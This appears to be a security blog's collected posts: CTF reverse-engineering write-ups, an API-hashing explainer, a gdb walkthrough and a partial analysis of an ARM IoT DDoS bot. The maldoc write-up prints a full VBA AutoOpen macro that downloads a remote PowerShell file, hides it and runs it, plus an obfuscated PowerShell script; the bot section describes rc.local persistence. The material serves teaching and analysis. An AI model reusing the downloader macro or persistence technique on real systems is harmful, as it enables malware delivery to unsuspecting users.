02 Mar 2019

Introduction

This year for ENUSEC’s LTDH (“Le Tour Du Hack”) I was tasked with writing the reverse engineering challenges needed for the CTF aspect of the event. I also wrote last year’s reverse engineering challenges, so I built on the feedback that I received. This year, however, I attempted to make the challenges a bit easier to capture the interest of contestants who were new to the field. If you’ve got any questions feel free to pop me a message on Twitter @LloydLabs or e-mail [email protected].

Go Fetch

I’m going to be using IDA for this writeup in conjunction with the Golang helper plugin which can be found here. We’re also given a file named fetch.dat to solve this challenge along with the executable. We can see main_main which is obviously the entry point. If we run the application we get this:

ENUMEME - Enter a string to be superly hidden using a top secret routine:

Ok, so it’s asking for user input. By the looks of the message printed, it seems as if it’ll encrypt or encode a string in one way or another. For the sake of this walkthrough I’m going to reference the IDA pseudocode output (to get this view from the graph or inline view, press F5), as the Golang compiler adds a lot of instructions for the runtime’s sake.

For reverse engineering reference, when we import a Go package when developing an application, and a method is called within that package (for example, fmt.Printf), the exported method will look something like: <package>_method in the binary’s function table. For example, fmt.Printf would look like fmt_Printf in disassembly. The variables passed on the left are internally used by Go. In the decompiled pseudocode view we can see our call which prints the following to the console:

fmt_Printf(a1, a2, a3, v6, a5, a6, (__int64)aEnumemeEnterAS, 73LL);
aEnumemeEnterAS -> ENUMEME - Enter a string to be superly hidden using a top secret routine:

Then, we can see this input being read from STDIN:

bufio___Reader__ReadString((__int64)&v42, (unsigned __int64)&v35, v13, v14, v15, v16, (__int64)&v41);

The variable v42 holds the input which has been read from STDIN. For analysis’ sake we’re going to rename this variable within IDA by pressing n whilst the variable is selected and changing the name to encrypted_string_input. We can then see this being fed into a method named Encode within the main package. It seems as if we’re taking an instance of FetchCtx within main and calling Encode on it:

main___FetchCtx__Encode(
    (__int64)&encrypted_string_input,
    (__int64)&v35,
    (__int64)&v30,
    v27.m256i_i64[1],
    v17,
    v18,
    (__int64)&v30,
    v27.m256i_i64[1],
    v27.m256i_i64[2]);

In Go, the prototype for Encode will look something like this:

func (ctx *FetchCtx) Encode(data string) []byte

Let’s take a look at the Encode routine. Upon inspection, a zlib writer is created via zlib.NewWriter, then the input (in this case, the string held in encrypted_string_input) is compressed, as observed here:

compress_zlib___Writer__Write(a1, a2, *(__int64 *)&v44[32], v14, v15);
compress_zlib___Writer__Close(a1, a2, v16);

A cipher is then created with aes.NewCipher. Taking a look at the Go documentation for this function, it takes a byte slice as its input, which is the key. You can view the documentation for the aes library here. Let’s take a look at the generated pseudocode again:

runtime_stringtoslicebyte(a1, byte_arr_key, v20, i, v15, v16);
*((_QWORD *)&v24 + 1) = *((_QWORD *)&v35 + 1);
*(_QWORD *)&v24 = v35;
v33 = v35;
crypto_aes_NewCipher(a1, byte_arr_key, v24, v25);

The Go runtime converts a string to a byte slice internally using runtime_stringtoslicebyte. In Go, this looks something like: byteArr := []byte("syscall.party"). We can see that the data at 0x4DA5A4 is being converted. For analysis’ sake, let’s go and rename dword_4DA5A4 to byte_arr_key.

lea     rax, dword_4DA5A4
mov     qword ptr [rsp+108h+var_108+8], rax
mov     qword ptr [rsp+108h+var_108+10h], 10h
call    runtime_stringtoslicebyte

We know this is a string, so let’s press R in IDA and select the bytes, this will convert it to the character equivalents:

Great. If it’s strange to you that this is not null terminated, this is the way that Go stores strings: a string is a pointer plus a length, and internal methods will always pass the length of a buffer, meaning there is no need for a null terminator. We then need to reverse the byte order as it’s shown in little endian, which is when the byte order is essentially “flipped”. For example, “flipped” would become deppilf. After converting it from little endian, this gives us a string of DER_DIE_ODER_DAS - a German phrase. So, we’ve recovered our encryption key, what’s next? We need to find the nonce that’s being used in the encryption; we can see Seal is being called on our cipher context.
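The byte-order step can be checked quickly outside IDA. The sketch below is a minimal illustration in Python, assuming IDA rendered the 16 bytes at 0x4DA5A4 as four little-endian dwords. The four dword values are reconstructed here from the recovered key rather than copied from the listing, so treat them as an assumption.

```python
import struct

# Assumed view of the 16 bytes at 0x4DA5A4 as four 32-bit values
# (reconstructed from the recovered key, not copied from IDA).
dwords = [0x5F524544, 0x5F454944, 0x5245444F, 0x5341445F]

def dwords_to_bytes(values):
    """Serialise 32-bit values back into the little-endian bytes stored in the file."""
    return struct.pack("<%dI" % len(values), *values)

key = dwords_to_bytes(dwords)
print(key.decode("ascii"))  # DER_DIE_ODER_DAS
```

The result is 16 bytes long, which matches the 10h length passed to runtime_stringtoslicebyte and is a valid AES-128 key size.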

We can then see main_statictmp_0 within the binary indicating an array of bytes. This is the way that Go stores static data within binaries. Let’s export this data, we can do this by highlighting the bytes then doing SHIFT + E which gives us this:

01 02 03 04 05 06 07 08 09 10 11 12

Ok, so this is our nonce. This would look something like this in Go:

nonce := []byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12}

Let’s now recap what we’ve observed so far. The program compresses the data using zlib, then encrypts it using AES with a key of DER_DIE_ODER_DAS and a nonce of 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12.

What about the file, fetch.dat we were given at the start? Taking a look at the content in HxD we can see it looks like simply a collection of random bytes which have no purpose, nor identifiers such as file magic:

Could this file have been encrypted using this algorithm? Let’s find out. All we need to do is the reverse of what the algorithm above does: load the file in, decrypt it, then decompress it. We can do this in any programming language of our choice.

  1. Load the target file
  2. Decrypt the target file using the found parameters above
  3. Decompress the target file using standard zlib parameters
  4. Profit???
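The steps above can be sketched in Python. This is a minimal sketch under assumptions: the call to Seal and the 12-byte nonce suggest AES in GCM mode, but the mode is not confirmed in the analysis above. It also assumes the third-party cryptography package is installed and that fetch.dat holds only the sealed ciphertext. The function names are hypothetical.

```python
import zlib

KEY = b"DER_DIE_ODER_DAS"      # 16-byte key recovered from the binary
NONCE = bytes(range(1, 13))    # 1..12, taken from main_statictmp_0

def aes_gcm_open(blob, key=KEY, nonce=NONCE):
    """Decrypt with AES-GCM (assumed mode); needs the 'cryptography' package."""
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    return AESGCM(key).decrypt(nonce, blob, None)

def recover(blob, decrypt=aes_gcm_open):
    """Undo the encoder: decrypt first, then zlib-decompress."""
    return zlib.decompress(decrypt(blob))
```

With the challenge file in the working directory, recover(open("fetch.dat", "rb").read()) should return the plaintext if these assumptions hold. The decrypt step is passed in as a parameter so that the decompression half can be exercised on its own.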

After following the methodology we’ve developed, the flag renders as:

ltdh{99754106633f94d350db34d548d6091a}


Secrecy

This challenge had the theme of a GCHQ “secure” login portal, with inputs for username and password. We can identify that it’s a .NET executable by simply throwing it into DiE which aids in identifying packers, compilers and languages used - I highly recommend you add it to your toolset if you’ve not got it already!

In order to decompile the .NET binary from CIL bytecode to readable sourcecode we’re going to use dnSpy - a great .NET disassembler, debugger and editor. Open the target file we’re looking at in dnSpy via the menu pane File -> Open - the assembly then will appear in the left hand menu view.

When a user wishes to log in and clicks the Login button, the button1_Click event handler is triggered:

private void button1_Click(object sender, EventArgs e)
{
  if (new Login(this.textBox1.Text, this.textBox2.Text).Verify())
  {
    Clipboard.SetText(Carrots.Decrypt());
    this.toolStripStatusLabel1.Text = "Status: OK login - copied flag to clipboard!";
    return;
  }
  this.toolStripStatusLabel1.Text = "Status: Bad login!";
}

We can see that to verify our input login credentials, the Login class is instantiated within the event handler, with the username and password as the respective inputs. Then, if the login is OK, the method Decrypt will be called on the class Carrots with the output being copied to the current user’s clipboard. Let’s take a look at the Carrots class.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace Secure_Login
{
	public static class Carrots
	{
		public static string Decrypt()
		{
			string result = "";
			byte[] array = Convert.FromBase64String("dATxa6TBMbpCztJwNiJfBQpCaIVQ0XjTg6lBMyJqym+Kyy0nm3SjyqYwGR2RJLLxkCbMFHQ3D95JD8tEaAYNIA==");
			using (Aes aes = Aes.Create())
			{
				Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes("HALLO_HANS_DU_HUND", new byte[]
				{
					73,
					118,
					97,
					110,
					32,
					77,
					101,
					100,
					118,
					101,
					100,
					101,
					118
				});
				aes.Key = rfc2898DeriveBytes.GetBytes(32);
				aes.IV = rfc2898DeriveBytes.GetBytes(16);
				using (MemoryStream memoryStream = new MemoryStream())
				{
					using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Write))
					{
						cryptoStream.Write(array, 0, array.Length);
						cryptoStream.Close();
					}
					result = Encoding.Unicode.GetString(memoryStream.ToArray());
				}
			}
			return result;
		}

		private const string 我们必须飞向月球并返回 = "dATxa6TBMbpCztJwNiJfBQpCaIVQ0XjTg6lBMyJqym+Kyy0nm3SjyqYwGR2RJLLxkCbMFHQ3D95JD8tEaAYNIA==";
	}
}

It seems to be a routine which uses the native Aes wrapper for .NET, deriving the key and IV from the password HALLO_HANS_DU_HUND (this can be observed being passed to Rfc2898DeriveBytes along with a hard-coded salt). The class is also obfuscated to a small extent to try and trick any budding CTF player. We can also see that the base64 string, which also appears under the constant 我们必须飞向月球并返回, is set to be decrypted with this derived key. So, what could we do from here? We could extract this decompiled code from the binary and decrypt the flag ourselves using it; however, we can look further into the program without going this far.
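To reproduce the key material outside .NET, the derivation can be sketched in Python. This assumes Rfc2898DeriveBytes is used with its defaults for this constructor (PBKDF2 with HMAC-SHA1 and 1000 iterations, password encoded as UTF-8) and that consecutive GetBytes calls return consecutive bytes of one PBKDF2 stream. The variable names are my own.

```python
import hashlib

PASSWORD = b"HALLO_HANS_DU_HUND"
SALT = bytes([73, 118, 97, 110, 32, 77, 101, 100, 118, 101, 100, 101, 118])

# Assumed defaults of Rfc2898DeriveBytes(string, byte[]): HMAC-SHA1, 1000 iterations.
stream = hashlib.pbkdf2_hmac("sha1", PASSWORD, SALT, 1000, dklen=48)

aes_key = stream[:32]   # GetBytes(32) -> 256-bit AES key
aes_iv = stream[32:]    # GetBytes(16) -> 128-bit IV

print(SALT.decode("ascii"))   # Ivan Medvedev
print(aes_key.hex(), aes_iv.hex())
```

Feeding the key and IV into any AES-CBC implementation (CBC with PKCS7 padding being the .NET default, another assumption about this sample) and decoding the result as UTF-16LE should reproduce what Decrypt returns.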

public bool Verify()
{
  string a = this.HashPassword();
  foreach (KeyValuePair<string, string> keyValuePair in AuthenticationPairs.logins)
  {
    if (this.username == keyValuePair.Key && a == keyValuePair.Value)
    {
      return true;
    }
  }
  return false;
}

The password input is hashed with MD5 and then compared against a list of valid logins in the AuthenticationPairs static class. The implementation is small: Verify simply compares the username and hashed password against a Dictionary<...> defined in that class. Let’s take a look at the definition of logins.

internal static class AuthenticationPairs
{
  public static Dictionary<string, string> logins = new Dictionary<string, string>
  {
    {
      "Churchhill",
      "4ca9d3dcd2b6843e62d75eb191887cf2"
    },
    {
      "GCHQ-Admin",
      "cde2fde1fa1551a704d775ce2315915d"
    }
  };
}

Nice, we’ve got username and hash pairs. A quick lookup of the MD5 hash 4ca9d3dcd2b6843e62d75eb191887cf2 returns war. On submitting the username Churchhill with this password, the program tells us that the login is correct. The flag is copied to the clipboard as: ltdh{ouch_that_was_easy}
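If an online lookup is not available, the same check can be done offline with a wordlist. The following is a minimal sketch: the wordlist is hypothetical, and it assumes HashPassword hashes the UTF-8 bytes of the password and returns lowercase hex, neither of which is shown in the decompiled code above.

```python
import hashlib

LOGINS = {
    "Churchhill": "4ca9d3dcd2b6843e62d75eb191887cf2",
    "GCHQ-Admin": "cde2fde1fa1551a704d775ce2315915d",
}

def md5_hex(word):
    """Hex MD5 of a candidate password (UTF-8 encoding is an assumption)."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()

def crack(logins, candidates):
    """Return {username: password} for every stored hash matched by a candidate."""
    by_hash = {md5_hex(word): word for word in candidates}
    return {user: by_hash[h] for user, h in logins.items() if h in by_hash}

# Hypothetical wordlist; a real run would use a larger dictionary.
print(crack(LOGINS, ["peace", "war", "letmein"]))
```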

Zeucquences

Again, we’ve got a .NET executable. However, this time it is a lot more obfuscated with junk code, variable name obfuscation using random Unicode characters and method obfuscation. We can see in Main what’s being done:

private static void Main(string[] args)
{
	象会典光県思分.漂亮的裤子("Give me a sequence to unlock the magic string - ✧・゚: *✧・゚:*");
	foreach (KeyValuePair<char, bool> keyValuePair in Program.者港本転l軽事楽確表陸情囲അവരസകരമ\u0D3Eണ\u0D4D英移量開o象会典光県思分代国l間玉間)
	{
		象会典光県思分.鞋子真漂亮("What's your input?: ");
		if (象会典光県思分.漂亮的眼睛()[0] != keyValuePair.Key - '\u0001')
		{
			象会典光県思分.漂亮的裤子("Wrong input!");
			象会典光県思分.漂亮的眼睛();
			Environment.Exit(1);
		}
	}
	象会典光県思分.漂亮的裤子("Way! Nice one!");
	Console.WriteLine(为什么编程对某些人来说如此困难.你好我的名字是().ToString());
	象会典光県思分.漂亮的眼睛();
}

What’re these weird methods being called? Let’s take a look at 象会典光県思分.漂亮的裤子. It seems to be a class that simply proxies to other methods, for example 象会典光県思分.漂亮的裤子 will simply proxy to Console.Write. We can also see that Way! Nice one! is printed after this loop to show that after a sequence of successful inputs feedback is given to the user. A method is then called, then converted to a string. Let’s take a look at that method:

public static string 你好我的名字是()
{
	int num = 1337;
	ulong num2 = 60378UL;
	if ((num2 & 221UL) == 4095UL)
	{
		ulong num3;
		ulong num4;
		do
		{
			num3 = num2 >> 2;
			num4 = num2;
			num2 = num4 - 1UL;
		}
		while (num3 != num4);
	}
	num -= num;
	num ^= num;
	char[] array = 象会典光県思分.楽確表陸情(象会典光県思分.那很容易(Resources.QPOopXopkQopkAxkpoKSpokAPOkPOAKopQ139AjAkXnZXnQjkAQKXjnSXkQAlAXjnasdowqeiqAiQiuAoplXnOJWQoiJEWjoiAScxnasdpQiowEoiJNNasfdJHOoihAFpAISFjhoiwr)).ToCharArray();
	for (int i = num; i < array.Length; i++)
	{
		array[i] = 象会典光県思分.門選宅柴京調比月級術目残(array[i]);
	}
	return new string(array);
}

This seems to reference a resource within the binary, and does some maths which doesn’t have any effect on the main operations - it’s simply there to obfuscate the program even further. It then seems to build a character array, weird. Let’s continue and see if there’s an easier way to solve this challenge rather than looking at this semi-obfuscated method.

We can see that Main enumerates over a dictionary, asks for input, gets the first character of that input and then compares it to the enumerated key minus one, i.e. char(key - 1). So, we need the characters in the order that they are in the dictionary: o, a, m, p, 0, 4, 1, A, M, c. We then subtract 1 from each. This means we have to input: n, `, l, o, /, 3, 0, @, L, b in order. Here we can see the output when we input this sequence of characters:

Give me a sequence to unlock the magic string - ???: *???:*
What's your input?: n
What's your input?: `
What's your input?: l
What's your input?: o
What's your input?: /
What's your input?: 3
What's your input?: 0
What's your input?: @
What's your input?: L
What's your input?: b
Way! Nice one!
ltdh{what_a_meme}

The flag is ltdh{what_a_meme}.
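The shifted sequence does not need to be worked out by hand. As a small sketch, taking the dictionary keys in the order listed above (the helper name is hypothetical):

```python
# Dictionary keys in enumeration order, as listed above.
KEYS = "oamp041AMc"

def expected_inputs(keys):
    """Each prompt accepts the character one code point below the key."""
    return [chr(ord(k) - 1) for k in keys]

print(", ".join(expected_inputs(KEYS)))  # n, `, l, o, /, 3, 0, @, L, b
```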

Chain

I wanted to make this challenge as if a maldoc (“malware document”) had been presented. We’re given the file cv_view_open.docx, upon opening it we’re presented with this malformed Word document:

It seems to use a social engineering method to get the user to enable macros on the document, showing a CV (“curriculum vitae”) that appears as if it’s corrupted and prompting the user to enable macros. Let’s take a look at the macros that they’re trying to execute. We’re going to use olevba, which will extract the macros from a Microsoft Office document. If you already have Python’s package manager pip installed, you can install it by running pip install -U oletools; otherwise find a reference to install Python. To view the embedded macros we could also simply use the Developer tab in Word, though I prefer to use oletools. This gives us an output of:

Sub ITS_LEGIT_I_SWEAR()
    Dim xHttp
    Dim bStrm
    Dim filename
    
    Set xHttp = CreateObject("Microsoft.XMLHTTP")
    xHttp.Open "GET", "http://10.42.2.19/drop.ps1", False
    xHttp.Send
    
    Set gobjBinaryOutputStream = CreateObject("Adodb.Stream")
    
    filename = "C:\Temp\" & DateDiff("s", #1/1/1970#, Now())
    
    gobjBinaryOutputStream.Type = 1
    gobjBinaryOutputStream.Open
    gobjBinaryOutputStream.write CreateObject("System.Text.ASCIIEncoding").GetBytes_4("M")
    gobjBinaryOutputStream.write CreateObject("System.Text.ASCIIEncoding").GetBytes_4("Z")
    gobjBinaryOutputStream.write xHttp.responseBody
    gobjBinaryOutputStream.savetofile filename, 2
    
    SetAttr filename, vbReadOnly + vbHidden + vbSystem
    Shell (filename)

End Sub

Sub AutoOpen()
    ITS_LEGIT_I_SWEAR
End Sub

The AutoOpen method in Office macros is called whenever a document is opened. We can see that ITS_LEGIT_I_SWEAR is then called, which downloads a file from http://10.42.2.19/drop.ps1 (a PowerShell script, as per the extension), then drops it into C:\Temp - a pretty lame downloader. Let’s look at the PowerShell script:

 . ( $pshoMe[4]+$PsHOme[30]+'X')( (("{39}{32}{7}{17}{37}{16}{27}{6}{40}{1}{21}{10}{4}{24}{19}{34}{29}{36}{26}{2}{8}{5}{23}{13}{35}{22}{31}{0}{28}{3}{25}{38}{15}{9}{11}{14}{18}{30}{12}{20}{33}" -f ') wLJ+wLJ{
    wLJ+wLJ    oMOdewLJ+wLJcwLJ+wLJrywLJ+wLJptewLJ','=wLJ+wLJ [SywLJ+wL','ng(oMwLJ+wLJOdawLJ+wLJta)wLJ+wLJ
wLJ+wLJ
    oMwLJ+wLJOdwLJ+wLJewLJ+wLJcryptedwLJ+wLJ wLJ+wLJ= wLJ+wL','wLJrypwLJ+wLJted[oMwLJ+wLJOiwLJ+wLJ] -bxor 0xF
wLJ+wLJ  wLJ+w','LJetBytewLJ+wLJs(kwLJ+wLJ4wLJ+wLJIwLJ+wLJWAS_ZUM_HwLJ+wLJOFFEwLJ+wLJ_HANw','wLJ+','LJ+wLJMwLJ+wLJOda','(wLJ+wLJ
wLJ+wLJ       wLJ+wLJ[PwLJ+wLJarameter(Man','[email protected]()wLJ+wLJ

    for wLJ+wLJ(wLJ+wLJoMOiwLJ+wLJ = ','J+wLJ.Tex','LJ+wLJnwLJ+wLJcodwLJ+wLJinwLJ+wLJg]:wLJ+wLJ:UTFwLJ+wLJ8.wLJ+wLJGwLJ+w','t.EncodwLJ+wLJinwLJ+wLJg]:wLJ+','wLJ}wLJ).rePLace(wLJk4IwLJ,[Stri','encrwLJ+wLJ','wLJ:wLJ+wLJUTF8.GwLJ+wLJetwLJ+wLJSwLJ+wLJtrwL','LJmwL','rwLJ','datwLJ+wLJory)][stwLJ','J+wLJing(owLJ+wLJMOdecr','wLJ+wLJ

wLJ+wLJ   wLJ','ng][ChAR]34).rePLace(wLJoMOwLJ,[Strin','Jstem.wLJ+wLJText.Ew','LJ+wLJhwLJ+wLJ; owLJ+wLJMOi+','wLJ0;wLJ+wLJ wLJ+wLJoMOi -lt oMO','LJ+wLJSk4I)','LJ wLJ+wLJ }
wLJ+wLJ
    [SwLJ+wLJyswLJ+wLJtwLJ+w','LJ+wLJromwLJ+wLJBase64wLJ+wLJStri','+wLJing]wLJ+wLJow','+wLJd += oMwLJ+wLJOenwLJ+wLJcwLJ+','ted = [System.CowLJ+wLJnwLJ+wLJvewLJ+wLJrt]::F','ypted)
wLJ+','+','J+wLJ {param','g][ChAR]36) G1H& ( hdtVerBOsEpReFerencE.TOsTRINg()[1,3]+wLJXwLJ-JoinwLJwLJ)','+wLJ wLJ+wLJoMwLJ+wLJOenwLJ+wLJcrwLJ+wLJypwLJ+wLJ','ywLJ+wLJptewLJ+wLJdwLJ+wLJ.Lengtw','w','+wLJ','LJewLJ+w','(wLJfunwLJ+wLJction Get-Crypt-LwLJ+wLJadwL','tawLJ+wLJ
  wLJ+wLJ  )

  wLJ+wLJ wLJ+wLJ oMOwLJ+wLJkeywLJ+wLJ ')).rEplacE('hdt','$').rEplacE(([ChaR]71+[ChaR]49+[ChaR]72),'|').rEplacE('wLJ',[sTRIng][ChaR]39) )

# TODO: Y3trZ3RgYmhQeGdue1BgYVBqbn17Z3I=

This seems to be an obfuscated PowerShell script, however we can see a comment at the bottom which is an encoded string. We can make out certain strings such as -bxor 0xF and Base64 within. This can be seen in the following excerpt:

-bxor 0xF

Hm, so we’ve got a base64 encoded string, we can see that an XOR operation is involved. Let’s decode the string, then decrypt using 0xF as the key. For this, I’d recommend using CyberChef made by GCHQ. You can see the recipe that I used here.

Nice! This then yields the flag:

ltdh{omg_what_on_earth}
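For anyone who prefers a script over CyberChef, the same two steps can be sketched in Python. This assumes the whole comment is XORed with the single byte 0xF, as the -bxor excerpt suggests. The function name is hypothetical.

```python
import base64

TODO_COMMENT = "Y3trZ3RgYmhQeGdue1BgYVBqbn17Z3I="

def decode(comment, key=0x0F):
    """Base64-decode, then XOR every byte with the single-byte key."""
    raw = base64.b64decode(comment)
    return bytes(b ^ key for b in raw).decode("ascii")

print(decode(TODO_COMMENT))  # ltdh{omg_what_on_earth}
```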


Conclusion

I tried to make these challenges as realistic and interesting as possible to captivate the interest of people who might be new to reverse engineering, while still testing the skills of people who are well-versed in the subject. Big thanks to CuPcakeN1njA (Charlie) for setting up the CTF and ensuring it ran smoothly!

re ida golang maldoc

02 Jun 2018

Windows API resolution via hashing

Although this method of API obfuscation is relatively old, a friend who wanted to increase his skills in the Windows sphere asked me about a way a few malware families seem to resolve APIs. It’s pretty simple, however he could not find any documentation with a solid programming example on the matter at the time, so I thought I’d quickly write something up regarding it. I was going to write my own loader for this example (loading the desired module via LdrLoadDll within ntdll.dll, walking the InMemoryOrderModuleList to find the desired loaded module, finding the exported function we’re after within the EAT..) - however I thought this might have been a bit overkill for such a simple concept. I want to cover writing your own PE loader in the future though, as it’s an interesting subject.

If you’re not familiar with the PE format, take a look at this diagram from Microsoft - it outlines the way in which the table is structured. When EAT is mentioned, we’re referring to the export address table.

EAT diagram

So, every DLL in theory should have an export table where the functions that it implements are exposed to the loader - in order for an application for example to use one of the exported functions. This information resides in the EAT (export address table).

When you traditionally compile an executable and implicitly use, for example, MessageBox, the compiler and linker will add this to the IAT (import address table), which will also record the module (DLL) that the symbol resides in.

But, we’re talking about obfuscation here right? What if someone doesn’t want an analyst to see this in the import table? This is where obfuscated resolution comes in. At runtime, we can load these functions on the fly given a name - meaning they won’t reside in this pesky IAT, thus making it harder to analyse (kinda ;)).

This is how API hashing works: we walk a given module’s EAT looking for the name of a symbol whose hash matches one we computed earlier. Once we get the address, we can freely use a function pointer and use the API just as normal.

In my example, I’ve decided not to use a cryptographically secure hashing routine, as we just want a hashing algorithm which is fast and not too computationally expensive, but at the same time produces unique enough results. I’ve chosen to use SuperFastHash created by Paul Hsieh. Again, this is a trivial example of how API hashing is used in the real world, it’s not meant to be a complex example!
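The lookup logic itself is small, and a language-agnostic sketch may help before reading the C code. The Python below is only an illustration: it swaps in djb2 as a stand-in hash (it is not SuperFastHash), and the export table is a hypothetical dictionary with made-up addresses rather than a parsed EAT.

```python
def djb2(name):
    """Stand-in 32-bit hash (djb2), NOT SuperFastHash."""
    h = 5381
    for byte in name.encode("ascii"):
        h = (h * 33 + byte) & 0xFFFFFFFF
    return h

# Hypothetical export table: name -> made-up address, standing in for a parsed EAT.
EXPORTS = {
    "MessageBoxA": 0x77D507EA,
    "MessageBoxW": 0x77D50838,
    "GetCursorPos": 0x77D4A2F0,
}

def resolve(target_hash, exports):
    """Walk the export names and return the address whose name hashes to target_hash."""
    for name, address in exports.items():
        if djb2(name) == target_hash:
            return address
    return None

WANTED = djb2("MessageBoxA")   # precomputed ahead of time in a real sample
print(hex(resolve(WANTED, EXPORTS)))
```

Only the hash value needs to be present in the obfuscated program, so the API name never shows up as a plain string.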

The code for this can be found on my Github here.

windows internal PE

12 Mar 2018

Regime walkthrough

Summary

This was the 2nd reverse engineering challenge I wrote and was meant to be an entry-level one for ENUSEC’s “Le Tour Du Hack”, and was worth 150 points. A file named login was given to the contestant. It had four solves in total.

I’ll be using gdb-peda and IDA free in this writeup. They’re both free.

Jumping in..

If we run the UNIX utility file on the binary we get this return:

login: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, not stripped

We can now see it’s not stripped, meaning we’ll have meaningful symbols within the binary we can relate to, and that it’s 32 bit. Running the binary gave us a prompt where we’d have to input a password.

Ok, we can now conclude that it’s comparing our input (a string) to another string within the binary. We can assume it’s using strcmp, or strncmp (the length-limited version of strcmp). Let’s take a look at it in IDA.

Looking at it in IDA, we can see a subroutine called login_show_splashscreen. Let’s check it out.

Oh, ok. It’s just showing the console stuff. We can ignore this. If we go down to where we’re receiving input, this is where the password is compared, so we’re more interested in this logic than anything else. We can see fgets is called, this is obviously being used to gather input from stdin (your console). Ok, now we see login_check_password; we’re passing eax to this method, which is obviously the password. We can see that there’s a “Welcome” message too if the password is correct, great! Let’s go check this out!

Let’s look at login_check_password. At the start of login_check_password it seems to be deriving different bytes from 0xDEADBABE. If we then look at another node, we can see these are referenced in some type of XOR loop where the length of our input is used (we can see a call to strlen; in x86 the result of a call will be placed in eax). Ok, so basically it’s now decrypting the encrypted password.

We can just ignore this routine though, it’s irrelevant. The strncmp has to see the “cleartext” (decrypted) password at some point, right? We can see there’s a call to strncmp, this is obviously comparing OUR password with the DECRYPTED password.

Let’s open the binary in gdb and put a breakpoint on strncmp, this way we can see what’s being passed to it. Run gdb login to open it in gdb. Now, we’ll proceed to put a breakpoint on strncmp. A breakpoint is a point at which the debugger will pause execution. We want to stop where our password is compared, so break strncmp or b strncmp. b is an alias for break in gdb.

Now type run or r. This will start the program. Once it’s loaded, input a dummy password. We should then break on strncmp where our input is compared.

We’ve input dummy_pw in this example, we can now see that it’s hit the breakpoint and gdb-peda has shown us the stack. In x86 with GCC, by default all of the parameters are pushed onto the stack for libc functions (C functions) unless another calling convention is used. We can see the second parameter on the stack:

0008| 0xffffced4 --> 0xffffcefc ("enusec{lemmein}")

This is the decrypted password. We could also access it in GDB by printing (simply print) the location of $esp + 8 where the breakpoint is sat. The password we input is at $esp + 4, as pointers in 32-bit x86 are 4 bytes wide (32 bits), so each stack slot is 4 bytes. We could also just simply do: x/s *0xffffced4 as we can see that 0xffffced4 is the address of the second parameter.
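The offsets follow directly from the stack layout on entry to a cdecl function. As a small worked example, assuming the breakpoint is hit before strncmp sets up its own frame (so the return address is still at the top of the stack), with a hypothetical helper name:

```python
ESP_AT_BREAK = 0xFFFFCED4 - 8   # peda listed the slot at offset 0008 from esp
SLOT = 4                        # pointer / stack slot size on 32-bit x86

def arg_address(esp, index):
    """Address of the 1-based argument 'index' on entry to a cdecl function.

    esp+0 holds the return address, so argument n sits at esp + 4*n.
    """
    return esp + SLOT * index

print(hex(arg_address(ESP_AT_BREAK, 1)))  # 0xffffced0 -> our input
print(hex(arg_address(ESP_AT_BREAK, 2)))  # 0xffffced4 -> decrypted password
```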

tl;dr

gdb login
b strncmp
r
# enusec{lemmein}

writeup trivial

19 Nov 2017

As the title suggests this is a bot which is spread by brute forcing SSH daemons and exploiting IoT devices using an array of exploits. This malware is mainly distributed by a Chinese actor who is familiar with C++ and C constructs; however, the actor’s knowledge of C++ only extends to using the std::string class. This bot was being distributed a few years ago just for x86_64 targets; this has changed along with some key fundamentals of the bot. It’s started to target embedded systems, which is why I thought I would cover it again. Linux/AES.DDoS is programmed in C++; we can see this due to the fact that all of the symbols are exported and C++ constructs are used.

We are going to be using:

A look at the file..

If we run ‘file’ on the executable we get:

ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.14, not stripped.

So, we’re working with an ELF (the standard executable format on UNIX-like systems, much as PE/COFF is on Windows) and it’s 32 bit. Its architecture is ARM and all of the libraries it’s using are statically linked. It is normal for an IoT bot to have its libc statically linked, as many systems will have incomplete or sometimes even broken libraries. Since it’s not stripped, the analysis will be a lot easier as we have meaningful names in relation to objects in the executable. For some strange reason, the executable was built for a 12 year old version of the Linux kernel (2.6.14); this could indicate that the malware was compiled on an IoT device or that the author just has an extremely old computer.

MD5: 125679536fd4dd82106482ea1b4c1726

SHA1: 6caf6a6cf1bc03a038e878431db54c2127bfc2c1

A quick rundown on ARM

ARM, in the form used here, is 32 bit, so all of our registers are 32 bits wide. In ARM, the standard calling convention is to place the first four arguments into r0-r3. That’s only four registers though; if there are more than four arguments then we place the rest of the arguments on the stack. We have 16 registers (r0-r15) to play with, and several of them serve a special purpose.

  • r0, r1, r2, r3 are used for passing arguments, r0 usually also holds the return value of routines.
  • r4, r5, r6, r7, r8, r9 are used internally within routines to store variables.
  • r10 holds the limit for the current stack.
  • r11 holds the stack frame pointer.
  • r12 can also be used as a variable within routines, however there is no guarantee that this register will remain unchanged across a call.
  • r13 holds the stack pointer (SP).
  • r14 is the link register, which points back to the caller.
  • r15 holds the program counter.

Nice, so now you’re an ARM expert we can continue.. ;)

Dive into main(..)..

As soon as the malware boots, execution starts from the original entry-point main, which is at 0x13DEC. We use rabin2 to find it by doing rabin2 -s kfts | grep "type=FUNC name=main", which gives us the following output:

vaddr=0x00013dec paddr=0x0000bdec ord=5366 fwd=NONE sz=688 bind=GLOBAL type=FUNC name=main

Nice! The executable isn’t packed. The main method then branches to a function named get_executable_name which reads the symlink /proc/self/exe via readlink(..). When a process reads this symlink, it returns the location that the executable is running from. We can see from the disassembly that we create a std::string and copy into it from the char array containing the path of the current executable. This is then passed into the function used for persistence.

We then either check if we’re running or add to startup. In the check_running procedure we do a call to ps -e then sleep for two seconds; we then get the output from the command and check to see if the current executable name exists in the output. If it does, we branch to exit with an exit code of 0 (which is placed into r0), which shuts down the process. If not, we go on to persistence.

Persistence

Persistence is achieved by adding to the /etc/rc.local and /etc/init.d/boot.local files (in the auto_boot function); however, before the malware modifies these files it first checks to see if it has already done so. /etc/rc.local executes its commands after all of the system’s services have started. The way that this is achieved is somewhat amateur, as the malware constructs a shell command and then uses the system function to execute it (which in essence spawns a shell via exec and waits for its return code).

